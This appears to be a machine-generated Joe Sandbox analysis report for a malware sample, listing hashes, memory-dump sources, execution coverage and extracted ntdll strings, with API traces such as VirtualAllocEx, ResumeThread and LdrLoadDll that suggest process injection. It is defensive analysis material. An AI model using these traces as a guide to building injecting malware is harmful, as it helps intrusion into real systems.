                                                • Opcode ID: 22e25b49192f84f9c0d959d2c75c123b15d53c6bc0a8c6af9f4c57195c72e028
                                                • Instruction ID: 48832ebc6406bb2637a816f6166ffc0d007ed1a3baa1d14a985ddda75e705b7f
                                                • Opcode Fuzzy Hash: 22e25b49192f84f9c0d959d2c75c123b15d53c6bc0a8c6af9f4c57195c72e028
                                                • Instruction Fuzzy Hash: 732138B1D002098FDB10DFAAC4857EEBBF4FF88324F14842AD459A7240CB789944CFA5
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D656,?,?,?,?,?), ref: 0102D717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: c5b33e01b3a359b1d44df13665b15d47050845cc9512ce483226306b27f67e83
                                                • Instruction ID: 3c881fabe0d6915d911b280e75f594a8658916f0a833360f35b57f418e5f3f19
                                                • Opcode Fuzzy Hash: c5b33e01b3a359b1d44df13665b15d47050845cc9512ce483226306b27f67e83
                                                • Instruction Fuzzy Hash: E221E2B5D002599FDB10CFA9D585ADEBFF5FB48314F14842AE958A7210D378A940CFA4
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0755BBDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: db8b752996299387bc629c45b98992735effad0821c3f10e985af6053d5fa7ec
                                                • Instruction ID: 6536a7af06b7f77ad5e2c69a8bfd2b6d672be21f92eba546e4d01fbaeeb924c6
                                                • Opcode Fuzzy Hash: db8b752996299387bc629c45b98992735effad0821c3f10e985af6053d5fa7ec
                                                • Instruction Fuzzy Hash: E7118CB18002499FCB10DFA9C445BDEBFF5EF88320F10841AE455A7250CB759540CFA5
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0102B079,00000800,00000000,00000000), ref: 0102B28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: dbb29149d2ede08c3e83823ec3e789721da177bd3628baaff88e3caaa1d0014f
                                                • Instruction ID: 5bd12fba055ed3a785e5efe8ab96623e2f06c1d2cacc82fff19a21b314e527a1
                                                • Opcode Fuzzy Hash: dbb29149d2ede08c3e83823ec3e789721da177bd3628baaff88e3caaa1d0014f
                                                • Instruction Fuzzy Hash: AB1123B6D003198FDB10CFAAC444BDEFBF8EB89310F10842AE959A7210C3B5A545CFA5
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0102B079,00000800,00000000,00000000), ref: 0102B28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 026a116aa8804cc735bb9f166f95479f6886263e1c158a8bedbae37bd8bb5cb5
                                                • Instruction ID: e8be988bd2bdb6e856690f4525c5b396f134c078d44357706f61b74551dc32ee
                                                • Opcode Fuzzy Hash: 026a116aa8804cc735bb9f166f95479f6886263e1c158a8bedbae37bd8bb5cb5
                                                • Instruction Fuzzy Hash: 021126B6C003199FDB10CF9AC444BDEFBF4EB88310F14842AD559A7210C375A544CFA5
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0755BBDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 70f54de03814bfa2511bd625e72e73bea06c32f033f6494d223c3e173ae0e533
                                                • Instruction ID: 027badc52c225bf0c7a2798c37d90eb300fc484745f4250f85f70ca899de9472
                                                • Opcode Fuzzy Hash: 70f54de03814bfa2511bd625e72e73bea06c32f033f6494d223c3e173ae0e533
                                                • Instruction Fuzzy Hash: C2116AB18002499FCB10DFAAC845BDFBFF5EF88324F10841AE515A7250C7759940CFA5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 52824123dff3ec1c498305084d146de3591dbc17d0cf8cae3603d93fc7c953ef
                                                • Instruction ID: 7740eec48677dc0cf396d942884838892026abe39f8caa0030371103acba7563
                                                • Opcode Fuzzy Hash: 52824123dff3ec1c498305084d146de3591dbc17d0cf8cae3603d93fc7c953ef
                                                • Instruction Fuzzy Hash: 7B1146B19002498BDB20DFA9C4457DEFBF4EB88324F24841AD459A7250CB78A544CB95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 26db8bb14d2dfee383b24c0a9fb3ca58dcd07dda18ae3fc9eece2959cfb13cdb
                                                • Instruction ID: 7e8222208f36a1c8f0aa55db67550f405ba9f0c9e4712b02a75bd45ac289a05f
                                                • Opcode Fuzzy Hash: 26db8bb14d2dfee383b24c0a9fb3ca58dcd07dda18ae3fc9eece2959cfb13cdb
                                                • Instruction Fuzzy Hash: 8C1136B1D003598FDB20DFAAC4457DEFBF4EB88324F24842AD459A7250CB75A944CFA5
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0102AFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b60a332df95da76ad8882caaffe3fbe4ec6234f0d666bac741a6474dd2a3fe85
                                                • Instruction ID: 58fe4020ff9f4dde267306cf3a4bf0be9e631fcb7abdfc87636eee9fa9e5096f
                                                • Opcode Fuzzy Hash: b60a332df95da76ad8882caaffe3fbe4ec6234f0d666bac741a6474dd2a3fe85
                                                • Instruction Fuzzy Hash: BF1110B6C002598FDB14CF9AC444BDEFBF4AB88324F14846AD968A7610D379A545CFA1
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0755E5DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: d6b8b57d1bc4a8e6b952cab1baa2ee4ff0e6ad75cdbee0e0be6c7da3c66b4550
                                                • Instruction ID: e987e29ea9ba24623e354d5578f898a902b9124e6eec52421feb951806aa5e66
                                                • Opcode Fuzzy Hash: d6b8b57d1bc4a8e6b952cab1baa2ee4ff0e6ad75cdbee0e0be6c7da3c66b4550
                                                • Instruction Fuzzy Hash: B31106B5800359DFDB10DF99C485BDEBBF8FB48324F10841AE958A7200D375AA44CFA5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0755E5DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 26099c312b06fefe62b6fa6ebfd9e9f52a99fe70cdf000f38d375d0e968f5898
                                                • Instruction ID: 14ece6f83df795dafe55f4e133702fdf99c0e304317de0c85ffa42e6690cc1b8
                                                • Opcode Fuzzy Hash: 26099c312b06fefe62b6fa6ebfd9e9f52a99fe70cdf000f38d375d0e968f5898
                                                • Instruction Fuzzy Hash: FC1113B58002599FCB10CF99D485BDEBFF8FB48310F14841AE958A7210D375A640CFA1

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5%
                                                Signature Coverage:9.4%
                                                Total number of Nodes:139
                                                Total number of Limit Nodes:11

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 453 417a03-417a2c call 42ecc3 456 417a32-417a40 call 42f203 453->456 457 417a2e-417a31 453->457 460 417a50-417a61 call 42d663 456->460 461 417a42-417a4d call 42f4a3 456->461 466 417a63-417a77 LdrLoadDll 460->466 467 417a7a-417a7d 460->467 461->460 466->467
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 0-4267580142

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 00413EBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 00413EBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 00413EBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 278 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: ^gA
                                                • API String ID: 3298025750-2986628814

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 417a83-417aa0 441 417a32-417a40 call 42f203 440->441 442 417aa2-417aa4 440->442 445 417a50-417a61 call 42d663 441->445 446 417a42-417a4d call 42f4a3 441->446 451 417a63-417a77 LdrLoadDll 445->451 452 417a7a-417a7d 445->452 446->445 451->452
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 468 417aa5-417ab0 469 417ab2-417abb 468->469 470 417a58-417a61 468->470 473 417aa2-417aa4 469->473 474 417abd-417ac6 469->474 471 417a63-417a77 LdrLoadDll 470->471 472 417a7a-417a7d 470->472 471->472
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 475 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,?,?,7311DEDF,?,?,7311DEDF), ref: 0042C2E7
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                Strings
                                                • Critical section address, xrefs: 01975425, 019754BC, 01975534
                                                • Critical section debug info address, xrefs: 0197541F, 0197552E
                                                • Address of the debug info found in the active list., xrefs: 019754AE, 019754FA
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754CE
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754E2
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01975543
                                                • double initialized or corrupted critical section, xrefs: 01975508
                                                • Thread identifier, xrefs: 0197553A
                                                • Critical section address., xrefs: 01975502
                                                • corrupted critical section, xrefs: 019754C2
                                                • Invalid debug info address of this critical section, xrefs: 019754B6
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0197540A, 01975496, 01975519
                                                • 8, xrefs: 019752E3
                                                • undeleted critical section in freed memory, xrefs: 0197542B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                Strings
                                                • @, xrefs: 0197259B
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019725EB
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01972498
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01972409
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01972506
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0197261F
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01972624
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01972412
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019722E4
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019724C0
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01972602
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                Strings
                                                • AVRF: -*- final list of providers -*- , xrefs: 01988B8F
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01988A67
                                                • HandleTraces, xrefs: 01988C8F
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01988A3D
                                                • VerifierDebug, xrefs: 01988CA5
                                                • VerifierDlls, xrefs: 01988CBD
                                                • VerifierFlags, xrefs: 01988C50
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                • API String ID: 0-1109411897
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                Strings
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019599ED
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01959A2A
                                                • apphelp.dll, xrefs: 018F6496
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01959A11, 01959A3A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01959A01
                                                • LdrpInitShimEngine, xrefs: 019599F4, 01959A07, 01959A30
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                Strings
                                                • LdrpInitializeImportRedirection, xrefs: 01978177, 019781EB
                                                • LdrpInitializeProcess, xrefs: 0193C6C4
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0193C6C3
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01978181, 019781F5
                                                • Loading import redirection DLL: '%wZ', xrefs: 01978170
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 019781E5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019721BF
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01972178
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0197219F
                                                • RtlGetAssemblyStorageRoot, xrefs: 01972160, 0197219A, 019721BA
                                                • SXS: %s() passed the empty activation context, xrefs: 01972165
